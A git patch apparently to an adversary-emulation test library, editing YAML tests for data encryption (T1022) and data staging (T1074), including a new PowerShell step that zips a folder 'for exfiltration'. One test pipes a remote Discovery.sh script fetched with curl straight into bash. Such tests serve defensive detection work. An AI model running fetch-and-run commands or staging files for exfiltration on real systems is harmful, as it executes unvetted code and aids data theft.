From 65d0f6dc5dd004d323ef0769b035fa843eb0e596 Mon Sep 17 00:00:00 2001
From: Andrew Beers <apbeers@icloud.com>
Date: Mon, 18 Nov 2019 07:28:44 -0800
Subject: [PATCH] Zip a folder with PowerShell (#640)

* add test to compress directory and delete it

* remove cleanup command sbecause I don't have a way to test them yet

* fix paths

* fix command misspelling

* zip into C drive

* fix paths to Temp finally

* move to data staging
---
 atomics/T1022/T1022.yaml                      | 10 +++++-----
 atomics/T1074/T1074.yaml                      | 15 ++++++++++++++-
 atomics/T1074/bin/Folder_to_encrypt/T1022.txt |  0
 3 files changed, 19 insertions(+), 6 deletions(-)
 create mode 100644 atomics/T1074/bin/Folder_to_encrypt/T1022.txt

diff --git a/atomics/T1022/T1022.yaml b/atomics/T1022/T1022.yaml
index ceb364ea..29e1343c 100644
--- a/atomics/T1022/T1022.yaml
+++ b/atomics/T1022/T1022.yaml
@@ -17,11 +17,11 @@ atomic_tests:
     elevation_required: false
     command: |
       echo "This file will be encrypted" > /tmp/victim-gpg.txt
-      mkdir /tmp/victim-files
+      mkdir PathToAtomicsFolder/T1022/victim-files
       cd /tmp/victim-files
       touch a b c d e f g
-      zip --password "insert password here" /tmp/victim-files.zip /tmp/victim-files/*
-      gpg -c /tmp/victim-gpg.txt
+      zip --password "insert password here" $PathToAtomicsFolder/victim-files.zip /tmp/victim-files/*
+      gpg -c $PathToAtomicsFolder/T1022/victim-gpg.txt
       <enter passphrase and confirm>
       ls -l
 
@@ -67,8 +67,8 @@ atomic_tests:
     name: command_prompt
     elevation_required: false
     command: |
-      mkdir .\tmp\victim-files
-      cd .\tmp\victim-files
+      mkdir $PathToAtomicsFolder\T1022\victim-files
+      cd $PathToAtomicsFolder\T1022\victim-files
       echo "This file will be encrypted" > .\encrypted_file.txt
       7z a archive.7z -pblue
       dir
diff --git a/atomics/T1074/T1074.yaml b/atomics/T1074/T1074.yaml
index 23c47792..c666c8bc 100644
--- a/atomics/T1074/T1074.yaml
+++ b/atomics/T1074/T1074.yaml
@@ -27,4 +27,17 @@ atomic_tests:
   executor:
     name: bash
     command: |
-      curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
\ No newline at end of file
+      curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
+
+- name: Zip a Folder with PowerShell
+  description: |
+    use living off the land tools to encrypt and zip a file for exfiltration
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
+    cleanup_command: |
+      Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
diff --git a/atomics/T1074/bin/Folder_to_encrypt/T1022.txt b/atomics/T1074/bin/Folder_to_encrypt/T1022.txt
new file mode 100644
index 00000000..e69de29b